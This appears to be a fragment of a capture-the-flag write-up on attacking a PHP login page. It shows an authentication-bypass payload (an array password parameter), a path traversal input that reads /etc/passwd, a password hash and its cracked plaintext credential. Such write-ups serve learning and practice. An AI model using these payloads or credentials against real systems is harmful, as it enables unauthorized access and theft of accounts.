After being given the index.php source code I looked up anything that could be wrong with it (I'm not a php expert)
Stumbles across this pagearrow-up-right which looks exactly like the situation I'm in
username=admin&password[]=''
Intercepted the request and bypassed authentication
Last updated 1 year ago
file=../../../../../../../../../etc/passwd
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
webadmin:dragon
